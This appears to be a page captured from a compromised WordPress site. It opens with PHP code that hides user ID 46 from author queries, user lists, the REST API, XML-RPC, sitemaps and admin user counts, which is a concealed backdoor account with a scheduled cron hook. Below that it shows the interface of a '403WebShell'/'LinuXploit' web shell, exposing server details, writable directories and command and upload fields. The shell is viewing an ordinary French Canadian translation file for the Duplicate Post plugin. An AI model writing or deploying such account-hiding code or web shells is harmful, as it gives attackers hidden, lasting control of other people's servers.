add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 198.100.159.156  /  Your IP : 216.73.216.172
Web Server : Apache/2
System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
User : optivie ( 1187)
PHP Version : 7.4.33
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/optivie/domains/optivie.com/public_html/wp-content/languages/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/optivie/domains/optivie.com/public_html/wp-content/languages/plugins/duplicate-post-fr_CA.po
# Translation of Plugins - Yoast Duplicate Post - Stable (latest release) in French (Canada)
# This file is distributed under the same license as the Plugins - Yoast Duplicate Post - Stable (latest release) package.
msgid ""
msgstr ""
"PO-Revision-Date: 2019-10-31 03:55:31+0000\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Plural-Forms: nplurals=2; plural=n > 1;\n"
"X-Generator: GlotPress/4.0.0-alpha.1\n"
"Language: fr_CA\n"
"Project-Id-Version: Plugins - Yoast Duplicate Post - Stable (latest release)\n"

#: src/handlers/link-handler.php:58 src/handlers/link-handler.php:114
#: src/handlers/link-handler.php:188
msgid "Current user is not allowed to copy posts."
msgstr "L’utilisateur actuel n’a pas les droits pour copier les publications."

#: admin-functions.php:750
msgid "Documentation"
msgstr "Documentation"

#: src/admin/options.php:165
msgid "you probably want this unchecked, unless you have very special requirements"
msgstr "mieux vaut que vous laissiez cette case vide, à moins d’avoir des exigences particulières"

#: src/admin/options.php:307
msgid "Bulk Actions"
msgstr "Actions groupées"

#: src/admin/options.php:186
msgid "Menu order"
msgstr "Ordre du menu"

#: src/admin/options.php:149
msgid "Author"
msgstr "Auteur"

#: src/admin/options.php:217
msgid "You can use * to match zero or more alphanumeric characters or underscores: e.g. field*"
msgstr "Vous pouvez utiliser * pour remplacer zéro ou plusieurs caractères alphanumériques ou tirets du bas : par ex. champ*."

#: src/admin/options.php:135
msgid "Template"
msgstr "Modèle"

#: src/admin/options.php:128
msgid "Featured Image"
msgstr "Image mise en avant"

#. translators: %s: Number of posts copied.
#: src/watchers/bulk-actions-watcher.php:55
#: src/watchers/link-actions-watcher.php:73
msgid "%s item copied."
msgid_plural "%s items copied."
msgstr[0] "%s élément copié."
msgstr[1] "%s éléments copiés."

#: src/admin/options.php:156
msgid "Password"
msgstr "Mot de passe"

#: src/admin/options.php:121 src/handlers/check-changes-handler.php:127
msgid "Content"
msgstr "Contenu"

#: src/admin/options.php:100
msgid "Status"
msgstr "État"

#: src/admin/options.php:93
msgid "Date"
msgstr "Date"

#: src/admin/options.php:86 src/handlers/check-changes-handler.php:126
msgid "Title"
msgstr "Titre"

#: src/admin/options.php:178
msgid "Comments"
msgstr "Commentaires"

#: src/admin/options.php:107
msgid "Slug"
msgstr "Identifiant"

#: src/admin/views/options.php:162 src/admin/views/options.php:166
msgid "Enable for these post types"
msgstr "Activer pour ces types de publications"

#: src/admin/views/options.php:127
msgid "Show/hide private taxonomies"
msgstr "Afficher/cacher les taxonomies privées"

#: src/admin/options.php:208
msgid "Add this number to the original menu order (blank or zero to retain the value)"
msgstr "Ajouter ce numéro à l’ordre initial du menu (vide ou zéro pour conserver la valeur)"

#: src/admin/options.php:206 src/admin/views/options.php:93
msgid "Increase menu order by"
msgstr "Augmenter l’ordre du menu de"

#: src/admin/options.php:180
msgid "except pingbacks and trackbacks"
msgstr "sauf pingbacks et trackbacks"

#: src/admin/options.php:171
msgid "Children"
msgstr "Enfants"

#: src/admin/options.php:163
msgid "Attachments"
msgstr "Pièces jointes"

#: src/admin/options.php:114 src/handlers/check-changes-handler.php:128
msgid "Excerpt"
msgstr "Extrait"

#: src/admin/views/options.php:58 src/admin/views/options.php:61
msgid "Post/page elements to copy"
msgstr "Éléments à copier"

#: src/admin/views/options.php:46 src/admin/views/options.php:187
msgid "Display"
msgstr "Afficher"

#: src/admin/views/options.php:37 src/admin/views/options.php:140
msgid "Permissions"
msgstr "Droits"

#: src/admin/views/options.php:28 src/admin/views/options.php:55
msgid "What to copy"
msgstr "Quoi copier"

#: admin-functions.php:603
msgid "Copy features for this post type are not enabled in options page"
msgstr "Les fonctionnalités de copie pour ce type de publication ne sont pas activées dans la page d’options."

#: src/admin/options.php:297
msgid "Admin bar"
msgstr "Barre d'administration"

#: src/admin/options.php:302
msgid "Edit screen"
msgstr "Écran d'édition"

#: src/admin/options.php:292
msgid "Post list"
msgstr "Liste des publications"

#: src/admin/views/options.php:202
msgid "Show links in"
msgstr "Montrer les liens dans"

#: src/admin/views/options.php:144 src/admin/views/options.php:147
msgid "Roles allowed to copy"
msgstr "Rôles autorisés à copier"

#: src/admin/options.php:201
msgid "Suffix to be added after the title, e.g. \"(dup)\" (blank for no suffix)"
msgstr "Suffixe à ajouter après le titre, par ex : « dup » (laissez vide pour ne pas ajouter de suffixe)."

#: src/admin/options.php:199 src/admin/views/options.php:82
msgid "Title suffix"
msgstr "Suffixe du titre"

#: src/admin/options.php:194
msgid "Prefix to be added before the title, e.g. \"Copy of\" (blank for no prefix)"
msgstr "Préfixe à ajouter devant le titre, par ex : « Copie de » (laissez vide pour ne pas ajouter de préfixe)."

#: src/admin/options.php:192 src/admin/views/options.php:71
msgid "Title prefix"
msgstr "Préfixe du titre"

#: src/admin/views/options.php:116 src/admin/views/options.php:120
msgid "Do not copy these taxonomies"
msgstr "Ne pas copier ces taxonomies"

#: src/admin/options.php:213 src/admin/views/options.php:105
msgid "Do not copy these fields"
msgstr "Ne pas copier ces champs"

#: src/admin/options-page.php:77 src/ui/admin-bar.php:89 src/ui/metabox.php:59
msgid "Duplicate Post"
msgstr "Duplicate Post"

#: src/admin/options-page.php:76 src/admin/views/options.php:14
msgid "Duplicate Post Options"
msgstr "Options de Duplicate Post"

#: src/handlers/link-handler.php:75 src/handlers/link-handler.php:131
#: src/handlers/link-handler.php:205
msgid "Copy creation failed, could not find original:"
msgstr "Échec de la copie. Impossible de trouver l’original :"

#: src/handlers/link-handler.php:63 src/handlers/link-handler.php:119
#: src/handlers/link-handler.php:193
msgid "No post to duplicate has been supplied!"
msgstr "Vous n’avez sélectionné aucune publication à dupliquer !"

#: src/admin/options.php:271 src/ui/row-actions.php:114
msgid "New Draft"
msgstr "Nouveau brouillon"

#: common-functions.php:79 src/ui/admin-bar.php:97 src/ui/admin-bar.php:115
#: src/ui/classic-editor.php:144 js/dist/duplicate-post-edit-450.js:1
msgid "Copy to a new draft"
msgstr "Copier dans un nouveau brouillon"

#: src/admin/options.php:276 src/ui/bulk-actions.php:69
msgid "Clone"
msgstr "Dupliquer"

#: duplicate-post.php:99
msgid "Settings"
msgstr "Réglages"

Youez - 2016 - github.com/yon3zu
LinuXploit